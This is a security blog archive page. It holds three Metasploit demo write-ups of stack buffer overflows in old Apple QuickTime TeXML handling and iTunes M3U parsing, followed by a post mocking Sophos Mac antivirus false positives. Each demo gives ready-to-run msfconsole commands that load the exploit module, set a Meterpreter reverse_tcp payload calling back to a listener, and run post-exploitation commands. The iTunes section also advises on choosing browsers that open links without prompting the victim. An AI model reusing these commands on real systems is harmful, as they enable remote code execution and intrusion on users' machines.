Tag Archives: Apple

CVE-2012-3752 Apple QuickTime TeXML Vulnerability Metasploit Demo

Timeline :

Vulnerability reported to vendor by Arezou Hosseinzad-Amirkhizi
Coordinate public release of the vulnerability the 2012-11-05
Metasploit PoC provided by juan vazquez the 2012-11-22

PoC provided by :

Arezou Hosseinzad-Amirkhizi
juan vazquez

Reference(s) :

CVE-2012-3752
OSVDB-87087
BID-56557
HT5581

Affected version(s) :

QuickTime 7.7.2 and earlier for Windows

Tested on Windows XP Pro SP3 with :

QuickTime 7.7.2
Firefox 3.5.1

Description :

This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, as the font-table field, which is used to trigger the overflow in this module. Because of QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be used to overflow, so at the moment DEP/ASLR bypass hasn’t been provided. The module has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).

Commands :

use exploit/windows/browser/apple_quicktime_texml_font_table
set SRVHOST 192.168.178.26
set TARGET 3
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sessions -i 1

getuid
sysinfo

CVE-2012-0663 Apple QuickTime TeXML BoF Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by Alexander Gavrun
Vulnerability reported to ZDI by Alexander Gavrun
Vulnerability reported by ZDI to the vendor the 2011-10-21
Coordinate public release of the vulnerability the 2012-06-12
Metasploit PoC provided the 2012-06-27

PoC provided by :

Alexander Gavrun
sinn3r
juan vazquez

Reference(s) :

CVE-2012-0663
OSVDB-81934
BID-53571
ZDI-12-107
HT1222

Affected version(s) :

QuickTime version 7.7.1 and previous

Tested on Windows XP Pro SP3 with :

QuickTime 7.7.1

Description :

This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, storing user-supplied data on the stack, which results the overflow.

Commands :

use exploit/windows/fileformat/apple_quicktime_texml
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid

Apple iTunes 10 Extended M3U Stack Buffer Overflow Vulnerability Metasploit Demo

Timeline :

Vulnerability fixed, without notice of the vulnerability, in product the 2012-06-11
Vulnerability discovered by Rh0
Public release of the vulnerability the 2012-06-20
Metasploit PoC provided the 2012-06-20

PoC provided by :

Rh0
sinn3r

Reference(s) :

EDB-ID-19322
HT5318
OSVDB-83220
Rh0

Affected version(s) :

iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.70 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.71 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.72 on XP SP3

Tested on Windows XP Pro SP3 with :

Apple iTunes 10.6.1.7
Apple QuickTime 7.72.80.56

Description :

This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7. When opening an extended .m3u file containing an “#EXTINF:” tag description, iTunes will copy the content after “#EXTINF:” without appropriate checking from a heap buffer to a stack buffer, writing beyond the stack buffer’s boundary, which allows code execution under the context of the user. Please note before using this exploit, you must have precise knowledge of the victim machine’s QuickTime version (if installed), and then select your target accordingly. In addition, even though this exploit can be used as remote, you should be aware the victim’s browser behavior when opening an itms link. For example, IE/Firefox/Opera by default will ask the user for permission before launching the itms link by iTunes. Chrome will ask for permission, but also spits a warning. Safari would be an ideal target, because it will open the link without any user interaction.

Commands :

use exploit/windows/misc/itunes_extm3u_bof
set SRVHOST 192.168.178.100
set TARGET 3
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

10 of 10 malwares detected by Mac Sophos Anti-Virus are false positives. Does yours?

On April 24, Sophos Naked Security blog had publish a post regarding malware infections on Mac OS X. Sophos has claim that 20% of Mac computers where carrying one or more instances of Windows malwares. All these malwares where detected though they’re free Sophos Anti-Virus for Mac Home Edition.

Flashback malware was the big story of April for Mac consumers and all anti-virus company have jump on this opportunity to promote they’re products and to distill propaganda around Mac OS X security. I agree with them Mac OS X is a product like other product, and Mac OS X has also to be protected against threats, but the proposed solutions are worse than to do nothing.

 

During my tests of Sophos Anti-Virus for Mac Home Edition 10 of 10 malwares detected by the anti-virus were false positives harassing me with constant alert pop-up during regular operations, Spotlight indexing, Time Machine backup. Here under a sample of 10 infections detected by Sophos Anti-Virus for Mac.

Perl/FtpExp-A

False positives due to binary format of the “affected” files.

/Users/xxxx/Library/Saved Application State/com.twitter.twitter-mac.savedState/window_1.data
/Users/xxxx/Library/Preferences/Macromedia/Flash Player/macromedia.com/support/flashplayer/sys/#s.ytimg.com/settings.sol

Troj/BredoZp-JO

Sophos him self is a trojan, and some iTunes applications and Chrome are backdoored and nobody known about it.

/Library/Preferences/com.sophos.sav.plist
/Users/xxxx/Music/iTunes/iTunes Media/Mobile Applications/iSSH 5.3.1.ipa
/Users/xxxx/Library/Saved Application State/com.google.Chrome.savedState/windows.plist

Troj/BredoZp-JN

iTunes is a very well-known backdoored software and one more time Sophos him self contain a trojan.

/Users/xxxx/Library/Caches/com.apple.iTunes/goog-phish-shavar.db
/Library/Preferences/com.sophos.sav.plist

Troj/Iframe-HY

One more time Sophos is a trojan, and now my Spotlight indexed files are also containing backdoor.

/Library/Preferences/com.sophos.sav.plist,
/Volumes/xxxx/.Spotlight-V100/Store-V2/700BF07C-170F-482E-A2BB-45EF8501935C/0.indexPostings

Mal/IRCBot-O 

VLC is containing an IRC bot, gotcha remote control of all VLC users.

/Applications/VLC.app/Contents/Resources/English.lproj/InfoPlist.strings

Troj/PhpShell-Z

One more time VLC how is containing a PHP trojan …

/Applications/VLC.app/Contents/Resources/English.lproj/InfoPlist.strings

Mal/PHPShell-A 

Everybody know that Sophos Anti-Virus products are developed in PHP.

/Library/Preferences/com.sophos.sav.plist

Troj/PDFJs-B 

Help my logs are containing trojans and Sophos one more time.

/private/var/log/DiagnosticMessages/2012.05.05.asl
/Library/Preferences/com.sophos.sav.plist

Mal/Badsrc-C

My Spotlight indexing has a dead malware…

/.Spotlight-V100/Store-V2/DeadFiles/orphan.ef786332/0000/0000/0151/22087716.txt

Troj/PhoexRef-A

Hu my screenshot of Metasploit are containing trojans (why not, lol) and Google drive is backdoored.

/Users/xxxx/Desktop/screenshots/metasploit-vmware-modules-research.png
/Users/xxxx/Library/Application Support/Google/Drive/sync_config.db
/usr/share/zoneinfo/UTC
/Library/Preferences/com.sophos.sav.plist

In conclusion Sophos is more strong to do marketing and give fear to consumers than to create a good Mac anti-virus that really detect something.